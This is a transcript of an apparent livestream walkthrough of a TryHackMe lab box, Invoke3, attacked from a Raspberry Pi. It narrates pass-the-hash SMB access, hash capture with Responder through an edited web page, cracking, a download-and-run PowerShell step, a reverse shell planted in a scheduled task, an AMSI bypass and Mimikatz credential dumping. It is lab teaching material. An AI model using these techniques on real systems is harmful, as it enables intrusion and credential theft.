So today's going to be a little bit different. I am on a Raspberry Pi 4, 4 gig with. Oh, just so my voice doesn't echo through there. That's all. I'm on a Raspberry Pi 4, 4 gig, um, and we have the Kali installed on it. So I've just been kind of messing with this like a little bit. So I might keep hitting the Windows key to try to bring up all tabs, but obviously doesn't bring up all tabs. So I'm just used to doing that. So if I continue to do that, sorry about that. But as you can see, I already connected my VPN, and we are going to work on Invoke3 today. Invoke3 is not released yet. You can get to it on TryHackMe utilizing that guy like right there. Okay, tryhackme.com/room-invoke3, but they are still seeing if it's going to be released or not yet. So they still have to accept or deny it. Ascertainment, how you doing? Beautiful day today, isn't it? All right, so like I said, we are on Raspberry Pi, so let's see how good this works. I'm probably got to download a bunch of tools, so it's going to be more of a just, hey, let's see what happens here, right? So let's go ahead and let's start off with downloading Rustscan actually, because we can. Let's go ahead and look at Rustscan download for Kali. Good morning, Samuel Hogg. How you doing? So if you don't have any of these tools, actually, I might actually just be able to. I think, just run my scripts and it'll actually download it for me. But we'll go ahead and we'll do it this way. We're not gonna download in Docker, Debian Kali. Here we go. I don't know if there's a really easy way. Build your own image. Homebrew. Build it yourself. I know if there's like a super easy way to be able to download it without using a Docker container for it. No, there's another easier way. Do agent sudo box? I've done it. Agent sudo I've done it a couple times now, I think. Let's see here. Then run command dpkg tech on file. Okay, cool. So we'll just go ahead and we'll just grab that. I think I've done agent sudo a couple times now. So don't know if I'm going to do that one again. Download the dev file. Okay, we'll do. Let's go ahead and go Rustscan. It's uploading. There's videos all the way up until March, like right now. Like as soon as I do them, they don't come out immediately. Let's go ahead and do this one, like right here. Where's the dev file at? Where is this dev file at that they speak of? Isn't it usually on the right hand side over here? Doesn't seem to be over there. So this is going to be the very first thing we're going to try to do. Is this it? No, negative. wget Rustscan download Rustscan dev. Okay. Here, let me just go. We'll just grab that right off of there. You found it. I have it somewhere. I just want this, like right here. That's all I really want. Alright, let's go ahead and hop back over into here, and we will open this guy up, and we'll do. We'll go ahead and oof, oof. There we go. No. Let's keep doing that. Should be able to see the Rustscan, right? Ah, okay. Was it DKPG TACI, right? We just do have to install Rustscan, that'd be sweet. No. That was DPKG. Do I have to download that file, right? DPKG tech on the file. Oh, we probably don't have DPKG, do we? Like I said, it's probably gonna be a lot of download stuff. Or did I type it in wrong? I typed it in wrong, huh? I think I typed it in wrong before. There we go, okay. Okay, no, sometimes you can double click files to use the same results. So we did that. I've not done this in a while with RusScan. That should, as far as I know, be it. Okay. Processing archive, boom, boom, tac install. Okay, that makes sense. Let's try that. Okay, what the hell was I thinking? AMD4 is not matched system. Oh, you know why? Because this is a 32-bit install. That's why. So if it's only going to install 64-bit, or if they have a 32-bit RusScan. Let's try that. They have a 32-bit one. Yeah, it was still 64. We need 32-bit RusScan, I believe. And they probably don't have it. That's okay though. We can go ahead and we can run let's see here. We can go ahead and we can run I'm not found it right. Well, let's first see what is the IP address of the machine here. So there's our IP address like right there. So yeah, now that I got this up and running and everything like that, guess I'll be prepared for some Wi-Fi hacking. Oh, no, you good, Samuel. I didn't even think about it, so I was like, oh yeah, because it's 32-bit. On the Raspberry Pi 4s, they only have 32-bit. On 2 and 3, they have a 64-bit version out. On the 4s, they only have a 32-bit version out, so not your fault. I didn't think of that either. All right, let's go ahead and do a mmap, tac-b-tac, tac-vv, tac-pn. Put that guy in there. And we'll do a tac-t4. Alright, so there's port 80. This is probably going to take a minute now. Now, this box does work. It's not the greatest because it doesn't have any resources in it yet, you know. But it does work. Let's go ahead and get another terminal open also. I'll launch a new instance of a terminal. And let's go ahead and do a sudo apt install terminator. So we can have a terminator in here, so I don't have to keep clicking around on these different guys and not know which one I'm on. Okay, so looks like we have 80, 135, 389. So it's still going, it's still doing its thing. As soon as we get terminator installed, our life will be a lot easier. There we go, much better. So let that guy go. All right. What else do I want? What else do I want? Terminator is done. We can go ahead and actually like make him like an actual like little icon thing and stuff like that. We'll do that later on. I think that should be about it. But let's go ahead because this guy's gonna go like a little bit slow. Let's go ahead and do an mmap tac-p88 and see if this is a domain controller. Let's just see if it's up first. And 88 is open, okay? We can try curb root if you want, things like that. None of that stuff's really going to work. So on Invoke 1 and 2, that's kind of the way to go. On Invoke 3, it is not, okay? So let's go ahead and check out port 80 like real quick. Okay, so we got Windows IIS server sitting here, right? Let's go and run a sudo apt install Buster. Is that just in the repository? Of course it's not. Why would it be? Let's go ahead and look up Buster in Kali Linux. I'm pretty sure it's supposed to be in the repository. It might just not be in the repository for this one. Yeah, it's definitely supposed to be in the repository, but it may not work. ARM64. Okay. Looks like we're not using that. What about GoBuster? Yes, please. Yes, I would like to install it. Alright, cool. We'll get GoBuster installed then. So as you can see, there is a little bit of a learning curve if you're doing it on a Raspberry Pi. Alright. Like I said, this is on the Raspberry Pi. We are RDP'd into it. So we're not like, it's not a, on my, if you've ever paid attention to my, VMs, you would see that there was a Raspberry Pi VM in there. This is not that. So let's go ahead and run a GoBuster scan on this guy. We'll do a GoBuster Veritach-U HTTP. That guy like right there. User share word list. There be big.txt. Just so you guys also know, with every single box that I make, you're going to use like fast track. RockU if you're like cracking a hash, because that's super quick. But if you're like brute forcing something, you're always going to use fast track, and you're most likely always going to use big.txt. I don't like, if you already know the way, if you already have like an idea, I don't like you waiting, 10 minutes to do it. I think that that's dumb, like right there. So we'll go and we'll use big.txt and see if we find anything in there, which we should, but like I said, this might be a little bit slow, so because it does not have any resources yet, so it might be a little bit slow. I'm going to turn this light on. It's dark as hell in here. There we go. Now if we were to use 2.3 medium.txt also, we probably get that faster. Big.txt is in alphabetical order, okay? But we do see this backup, right? We get this 301. I just did it. Alright, so if we go ahead and try to go /backup, we get a 301 is forbidden, right? So we'll see forbidden there in like a little bit. Now just because backup's forbidden, that doesn't mean necessarily that everything within backup is forbidden. So just because backup's forbidden, we still may be able to look at different files within backup. Okay, so if we actually do a /backup, and then we put an argument at the end there like text and let's say zip. So we'll do text. We'll do text first and make sure that's actually .text. I don't know if it's going to come through if I have to put a .text or just txt. What time is it for me? It is 9:30 p.m. So 21:30. Why you use Raspberry Pi VirtualBox? Just because I felt like doing it one day. So I have a Raspberry Pi VirtualBox somewhere. This is the regular Raspberry Pi, but if I want to go to VirtualBox here, I also have this guy right here, which is a VirtualBox Raspberry Pi. Just because I felt like doing it one day. Test different stuff on it. Have fun with it. So I should have already found it. So I think I gotta do .text, don't I? Like .text, right? Does that have to be like that? I think Fearox Buster, I don't think you have to do it like that. See, Raspberry Pi OS, just to, mess around with it and stuff. Do different stuff to it, whatever I want to do. Have fun. No, there's no advantage of it, no. The only reason I'm using a Raspberry Pi like right now is just because this is, it's going to, help me with doing the Wi-Fi hacking, that's all. I plan on doing that soon. So I believe we should have already found it again. Like I said, this machine, it's not online yet, so it's not going to be friendly like right now. So that's why I'm kind of going through this guy also. So it hasn't been approved yet, or denied, whichever one they decide to do. But as you can see, it doesn't have the resources, but we do get this backup.txt like right there. So we do see a status 200 for a backup.txt. Let's go ahead and check that out. Alright, so we can do a /backup.txt. And if you guys were watching DZ64 stream, you would see a different way of being able to do this. How he did it like right here, but you go ahead and you grab that hash, okay? That looks like an NT hash. We're not going to be cracking it. Right? I mean, you can try all you want. I mean, I guess depending on the word list, you can crack it, but let's go ahead and do a let's first off make a directory for try hack me. CD in there. Make directory for Invoke3. CD in there, and then from here we'll go ahead. We're going to do a SMB client, tac L, and we saw that the user was Alice, right? That's what it said, Alice, okay? Who's been a user on all the invokes so far. So let's go ahead and throw the IP address into there. 10.10.244.172, and we're going to do Alice. And then what we can do with SMB client is we can use a password hash. At least we should be. Yep, tac pwnt hash. So we can actually tell it pwnt hash. And let's go ahead and echo also this nt hash. Into hash.text. So we always have it. And now for the password, we can just put in that hash, copy that hash into there, and we should. Oh, that's not going to work. I definitely. Tac Alice is not anything. That was dumb. Tac you Alice. Tac password nt hash. We want to try to log in as Alice, see if she can do anything in SMB. And sure enough, it drops all this. Okay. So now we know she can do stuff. We can look at inetpub. Inetpub is where the IIS server information resides. Inetpub. Did it break? Nope, I'm just an idiot, that's all. And I put the slashes the wrong way, as usual. I do that all the time. So whenever someone tells me / or backslash, I say, uh-huh. So I just have to type out HTTP and do that. And I'm like, nope, slash is the wrong way. Really now. Let's try it with TACO. Because we should be able to get in there. Just fine. But it seems like the box is failing because it's not live yet. Oh, that's good. It looks like the box is starting to die on us here. So I'm not really too surprised about because it's, like I said, not live yet. But last time I was at least able to get through it. Unless there's a bunch of people on it like right now, then that would make sense. But I feel like there's not a bunch of people on it. If we can't get through on this one, then I'm going to go back to, we can always turn it on my actual machine itself and do it. But, oh, there we go. Let's try that. Oh my god. I'll say, wait a second, what? Okay, so we're back in it. If we do a dir in here now, we can see www root. So if we cd into there, we can see IIS start.htm. Now something else I got to check on here is this smb server.py here. Can we install Inpacket on here? Oh man, can we install Responder on here? Okay, so we do have a sudo responder then. Then we can do our tac I. Ton 0. Tac what, RDW, I believe it is. Oh, R doesn't use the same word, does it? And let's see if responder is actually going to pull up stuff. Let's see if SMB server is on first. SMB server is on, okay. So what we can do in here is we can go ahead and get that IIS.htm. So let's go ahead and get IIS start.htm. Hello, Christy. How you doing? What would be a good episode, Samuel Hogg, to upload to YouTube? So let's go ahead and now do a CD in a desktop, try hack me, or not desktop, CD in a try hack me, Invoke3, and let's go ahead and do a nano on that. Ooh, let's actually try this. Sublime. Damn. I'm doing pretty good. Oh yeah. That's why I kind of want to do it on here, and plus I wanted to start getting this thing ready for what is it for Wi-Fi hacking. Let's go ahead and try to get Sublime Text on here. See, a lot of the stuff isn't going to work because a lot of it's made for 64-bit. Huh. Okay, cool. So, Sublime Text. Okay. Maybe I should just type it incorrectly. That would be a crazy concept, huh? It's not in the... Okay. That would probably be patch for with 86. Okay. Select channel to use. I guess the stable version. What is that going into? Alright, so we can probably just grab from there actually. We might still need that key, I don't know. Let's go ahead and do that. Alright. So it looks like it did that. Let's go ahead and cat that Etsy app sources.list. Okay, yeah, it's in there, okay. Let's go ahead and do a... Yep, we got to update it, and then we're going to go ahead and install from there. Because we just put a new source list in there. Oh, I'm busy. Did miss your stream yesterday. Oh, yesterday? Yesterday was alright. We did hacker versus hacker. It was one of the box that try hack me. It was alright. Okay, so I did not download the public key. Did tell me to do that. I just skipped that step because, you know, I'm an asshole. Just want to stop that. We'll go ahead and download that public key. Okay, and then we'll run that guy again. We shouldn't see that public key thing pop up again. There's that Sublime Text like right there. And he's updating like right now. So that might take a minute. So while that's actually updating, what we can do is a nano CD into try hack me Invoke3, right? And we can go ahead and do a nano Invoke3 or nano IIS start.htm. What we're going to be looking at down here is we want a way for, because there's users on this machine, right? So if you read it or whatever, it says that there's active users on the machine. So if we're on a company website and there's active users on the machine and we're able to mess with the website, we could probably mess with this picture, like right here, right? And we could probably do something like, I'm going to mess it up right now, I am. Okay, we probably do something like this, where we're going to tell it to go back to a share for the picture, right? So let's go ahead and do an ifconfig. Oh, W lands up. Well, obviously it's up, but let's go ahead and do an ifconfig. And then do like a /share. Okay. So now that's going to send it back to me, right? Do they have, the next question is, really? I mean, it's like right there. That's really weird, huh? Because it's in there, it's saying that it can do it, but for some reason it's not doing it. Maybe something like this. Let's try this, like right here. That's very, very strange. I'm going to do a sudo app upgrade. We already did an update. Yeah, okay. Let's do an update again. Sublime Text is in there. That's very, very strange. Okay, so we changed that over, right? Now, if there's active users on this machine, do you have a private course? I do not have a private course now. YouTube. I've never done anything with private courses or anything like that. I don't believe in making money off of this. Okay, was not understood. Was this sudo upgradable? No. to app. Is it install upgradable? Is that what the heck? Run app list. Okay. Maybe I should read. So you don't want a private course from me. So now that we changed this over here, right? Let's go ahead and delete this is start over here, .htm. And we're going to put this guy back into there. Now remember, I made that so that it's going to a share on me, right? Oh, life is great. Oh, talking to Christy. Pure crap. Miserable. How are you? Okay, let's go ahead and put in start. .htm. We're going to put that back into there. Now remember, if you guys don't remember, I just changed it so that it's calling, that image is calling back to me, right? And I have responder up and running. Now something I don't like is that what I don't have up and running is in-packet. So I want to see if in-packet something else I don't like is that this guy does not seem to like change to English. So I keep going to stuff and yeah. So install it packet. It should just be Python 3. Okay, good. Thank God. Okay. Oof. Okay. I'll say I'm like, yo, like this should be good. Like we should impact. You should definitely be able to do on both of them. I feel like. Do I have to type in the whole damn thing? Like really? Do I have to do the locate and packet? Or like SMB server.py? I do probably, huh? And I'm gonna have to put in this whole thing, aren't I? Probably have to do like a Python 3, that whole damn thing. Yep, I do. Alright. So as I said, there is hey, real quick, just because of the chat. If you think your life is bad, now it may be. I'm not there with you. I'm not in your shoes. You know, say everyone's has a hard time, stuff like that. Everyone falls on hard times, things like that. I think I've been to some of the shittiest places on earth. In all honesty, like if you got a phone or you got internet, you're doing pretty good. Like I know everyone falls on hard times, and you know it's hard to like understand that. You know, so, oh shit, story time. All right. Real quick though, I know it's like hard to like understand that because you know, especially if like you grew up in like Europe, America, you know, a lot of the first world Asian countries, stuff like that. If you grew up in those countries, it's really hard to understand. Like, oh well, I have a phone, you know. But tell us my trouble. I don't have any troubles. Let's Christy does story time. All right, what do you want to hear story time about? What do you guys want to hear about? Let me go ahead and pause the video like real quick. It's sure that YouTube does not want story time. All right, so how do you find life in Japan? But that's all right. This is my third time being here, so it's whatever. All right, so since we put that back into there, whatever it calls back, it's going to send us the net NTLM hash. Okay, so this is a net NTLM hash, like right here, right? So I already copied it. Let's go ahead and do a nano net.text, and we'll throw that in there, right? And then we'll use John. I don't know if I need like a tac word list or tac w equals user share word list rocky.text. Ooh, rocky.text still gunzipped. We actually need a gunzip. User share word list rocky.text. This is my third time in Japan, so I was here in 2004, well 2005 to 2007. I was here a couple years ago, and I'm here now. So, all right, let's go ahead and do a John tac word list equals user share word list. I know that's kind of like oh, I've been here 3 times. Yeah, no, not acting like that. Here in the Marine Corps, you seem to end up in the same places a lot. So it just kind of gets to the point where it's like, oh, yep, back there again. We're going to do that for hash, or no, not hash.text. We're going to do that for net.text, right? For the net NTLM, okay? So something I did notice on my laptop, what I had to do was attack format equals net NTLM v2. Okay, just so you guys know. So if it's not cracking like that, you might have to throw in that net NTLM v2. So we do get parts password here, which is password 1, right? Go ahead and copy that, and let's try using evil. I don't think I have it. Evil 1RM, right? Know what else we don't have? Okay, so let's go ahead and do an evil 1RM. It says I don't have anything actually, like, I haven't done anything in here yet. I have to actually look it up like real quick. Evil 1RM. It's not all complete for me. Tac U hearts. Tac P, that guy right there. We're going to have to put that in quotes also, because that @ sign's going to mess it up, I believe. I think it will. Tac I is going to be the IP address of this box over here, right? So let's go ahead and grab that IP address like real quick, which is going to be, I don't even remember. 10.10.244.72. Alright, so we'll go to 10.10.224, I think I said right? Yep, 244. No, 172. So let's go ahead and see if we can evil 1RM as him. Oh, no, I mean, my family, I mean, they're good here. They're having fun. I mean, my wife, she does something fun, like every weekend we do something fun, so. My son, this is all he knows, my son. He doesn't really know much different than this. So as you see, we come in as see users hearts documents, alright? Now we can manually enumerate this, or what we can do is use power up, right? So let's go ahead and get power up like real quick. So we'll do a GitHub power up PS1, okay? Now let's go ahead and grab this guy, and we will also go ahead and make a tools directory. So CD back into there, and make directory tools. CD and tools, and we'll go ahead and we'll download power up, right? So all we're going to do with this first is go raw, and we're just going to do a wget on the raw over here, and we'll we'll download power up and do like that. Yeah, when I was here the first time, a lot of people felt like that, like they were lonely, stuff like that. But every place kind of what you kind of make of it. That's what I've kind of noticed throughout my career. Everyone hates Camp with June because there's nothing to do. Well, if you get out in town and stuff like that, if you do stuff, there is stuff to do. So. Alright, so let's go ahead and do a wget, that guy right there, and we'll go ahead and we'll do a Python 3 tac-m http.server on port 80, right? Do I have to do a sudo for that? Okay, I do. Let's go ahead and exit out here, and we'll do an ifconfig like real quick, and let's go ahead and grab our tunnel 0 IP address, and we'll do a IEX IWR HTTP. And then my IP address, powerup.ps1. It's not going to work. Alright, so it says that Internet Explorer's first launch configuration not complete. So if it says that, what we have to do is use basic parsing. So we have to do a tac use basic parsing. It might still not work. That's okay. That's kind of how it's designed. Okay, I did get it. Okay, so sometimes you need to do an AMSI bypass. Sometimes you don't. Don't ask me. Don't ask me. So, all right, cool. Yeah, it'll get it, but then all of a sudden it'll be like, this is a virus. So sometimes you do it, sometimes you don't. Okay, so we got the power up in there now. Let's go ahead and do a invoke all checks. If I do it on the right spot, invoke all checks. But yeah, Dennis Volfo. On my YouTube channel, I have like paths, you could say, I guess, or something like that. Like, I don't know, I have like the try hack me one is just filled with, just try hack me stuff like that. But there are like the INE stuff is on there. There's different things on there that you can kind of follow along and learn some different stuff with. So, so this guy like right here, this modifiable path, if we were to do this, if we were to write that DLL hijack, you're just going to be hearts again. So it doesn't matter. Hearts, it belongs to hearts. So you can run that all day. You're just going to keep becoming the same person. It's not going to matter. This is a lot more. This is a lot more stuff. This is really weird. Usually doesn't have all this crap in here. Scheduled task files. That's weird. Space manager task? What? Recovery check? What? What is all this? So that's the first time I've seen all that before. I've literally done this box before on this thing. On this exact one. Awesome, thank you. Thank you very much. So what we're gonna do actually is we're not even going to we're not gonna do that. Like right there, for some reason it seems to be messing up on there. So we're just gonna manually enumerate, which is manually enumerate is literally typing in dir, like right here. Okay. Just most people I notice go straight to the desktop and look for a flag, but as with the 3 boxes that I made, there's only 1 flag, and it's all when you're an administrator. So we have this ping.ps1 like right here, right? Now, invoke all checks, it has worked for me before, and it has shown that, hey, there is a scheduled task that I can mess with, right? So if it's a scheduled task, and there's other people on this machine, then hopefully somebody else made the task, right? And I can become someone else. So if we do a type ping.ps1, it's literally just pinging itself. It's just doing a loopback ping, right? So let's go ahead and try to, let's go ahead and get invoke TCP. So we want to go to invoke, oh, that's not what I want. Not that. Yeah, that site doesn't exist. Invoke PowerShell TCP PS1. Okay, and we can go ahead and grab Nishang's invoke PowerShell TCP.ps1. Alright, and let's go ahead and grab this like right here. But yeah, Dennis, I also have a bunch of Active Directory stuff on there too. If you watch all the CO, there's a whole bunch of streams are called One Day Stream. It's like CRL or CSL Labs, I forget what it's called. But those ones like right there have a whole bunch of Active Directory stuff on there. And the Hack the Box One Day Streams, or TJ, yeah, Hack the Box One Day Streams, and TJ's Nose List is on there also. It's just like I have videos coming out like right now in March because I release like 3 a week just in case I get deployed all of a sudden. So then videos keep rolling out. So the Raspberry, this is not a VM. This is the actual Raspberry Pi itself. This is not on a VM. This is just straight up on a Raspberry Pi, sitting right over here. See, Raspberry Pi. If you don't notice, it's a locale sign. And it's running off of that like right now. That's what this guy's running off of like right now. Okay, so let's go ahead and do a, did I already do raw on this thing? Yep, so let's go ahead and grab that. We'll go into tools. Alright, so let's go ahead and CD into tools. We're already there. And we'll do a wget, that guy right there. And we can go ahead and do a, we want to put this over here, right? But we want to save it as ping.ps1. So let's go into a Python 3 HTTP web server. I need a sudo in front of it for some reason on this one. With all my other one I don't. But let's go ahead and do a wget HTTP. My IP address, right? 10.13.2.12 for me. Slash, where's it at? There we go. Invoke PowerShell TCP.ps1. Remember, we do have to do a use basic parsing, right? Use basic parsing. And we're going to go ahead and do an out file of ping.ps1. Now, before we do that, let me actually go ahead and copy this whole thing like right here at least. Because before we do that, we want to, in a real assessment, we want to back up. We want to do like a copy ping.ps1 to ping.ps1.back or something like that. You know what I'm saying? Just so we don't delete it. You know? Obviously on here you could just delete it. Then we're going to delete ping.ps1. And then we're going to go ahead and put that guy in there. Out file is going to be ping.ps1. Now if I do a dir, I know it looks all messed up. I got it. I understand. If I do a dir now, we have ping.ps1, and you can see the length is much bigger. So now what we have to do is, I still messed it up actually, because if I type out ping.ps1, it doesn't have anything at the very bottom, right? So let's go ahead and actually just delete what I just did, like right there. Delete ping.ps1, and do a nano ping.ps1, or invoke PowerShell TCP. And what we want to do is we want to, at the very bottom, invoke PowerShell TCP, TAC reverse, TAC IP is going to be 10, I already forgot it, my IP address right, 10.13.2.12, 10.13.2.12, TAC port, we'll say it's 53, okay, so we'll be listening on port 53, alright, oh god, alright, and that should be it, like right there. Now I know it's invoke PowerShell TCP, because if I scroll all the way up to the top here, the function is invoke PowerShell TCP. Remember, Windows does not care if it's capitalized or not. So we're going to go ahead and we're going to bring that file straight back over there again. Start up another web server again. And we're going to bring that invoke PowerShell TCP.ps1 over in there. Have a listener on port 53. And we're going to call it ping.ps1. So now if there is a scheduled task that goes ping.ps1, hopefully it's running with a different user, and we get a call back over here. We get tested like real quick with a quick ping.ps1. See if it works. And we do get a callback over here with hearts, okay? So we know that our reverse shell is working, and like Defender or anything like that is not blocking it like right now, right? We do know that. So now we just gotta wait a minute and hopefully we get a callback with something. Come on, big guy. It should be about every minute that the callback comes through, just so you know. So, I think that we can also do oh, and we are getting a callback right now. Cool. So, let's go ahead and do a CD into C drive, dir, CD into users, CD into administrator, and CD into desktop, and there we go. There's our root.txt that we can read from there. So that all works. Just show you that I am actually administrator. Let's go ahead and get one more thing out of here. And oh, that's not what I want to do. Get that guy back up. I want to minimize him. Didn't really even need to minimize him, but what I want to do is a invoke mimikatz. Go ahead and grab invoke mimikatz like real quick. We'll throw this guy on there. Is that the right one though? 2.1. And how big are you? Be the bigger one. In case you guys are wondering. 3.4. That's the one that we want, like right there. Go ahead and view raw. Okay. So we want G4 USS 47. Group 47. Okay. That's what we want. We can copy that. Okay, we'll go ahead and we'll do a wget for that in our tools, right? Wget, that guy right there. All right, cool. I'm not going to show you guys the root.txt because I don't want people to go in there and just put it in there. You can actually go through the box. But let's go ahead and do a IEX IWR, use basic parsing. Forget it every time. 10.03.12 invoke mimikatz.ps1. Let's go and grab that like real quick. Is it going to take it? That's the next question. Is it actually going to take it? Okay, so that one's been blocked by our antivirus. It contains a virus. That's okay. Let's go ahead and throw an MSI bypass at it. I'm going to get a real quick one here. I have an idea. I can go to github.com/overgrown-1 because I don't have any of my scripts in here, remember? So I have 0 scripts in here like right now. If I go to invoke everything, I know right where to find a PowerShell bypass. Or a, yeah, for PowerShell, AMSI bypass there. And that's going to be in invoke everything winrm.ps1 because this thing automatically runs one, I believe, if I remember correctly. Yep, there's one like right there. So if we just copy this whole thing right here, instead of trying to search on the web and try to find one and everything, there we go. And we can throw this in there. Did it mess the whole thing up since it did that now? since I did that, is it like, like I'm broken now? Do we have to do this whole thing over again? Because if so, we're probably not going to do it. Let's see if we can see anything get down here. Nope. Looks like, oh, there we go. Okay, cool. Do you get it now? Okay, got it. Okay, cool. And yep, now we're good. Okay, so let's go ahead and do an invoke mimikatz. And we should see stuff get dropped here. Oh, didn't see anything, did we? Invoke mimikatz attack command. I'll say dump. I will say /patch. Maybe. Maybe not. Hopefully. Looks like it's probably doing it. It's going to take a minute to do though. You can do it. Come on now. Come on now. Alright. Good news is that we are administrator already. Let's start cleaning this stuff up. This might take a while to run because we are going through a Raspberry Pi and also on a box that doesn't actually exist yet on TryHackMe, if it ever is going to exist, which probably won't. But that is Invoke3 on a Raspberry Pi. So Raspberry Pi 4 gig, one like right there. This guy, he's gonna take forever to dump this like right here. But yeah, that should be pretty much everything like right there. So I hope you guys liked the video. I hope you know, learned a little bit something about the Raspberry Pi VMs, and stand by for what is it? We're gonna be doing some Wi-Fi stuff coming up next week. So y'all have a good one.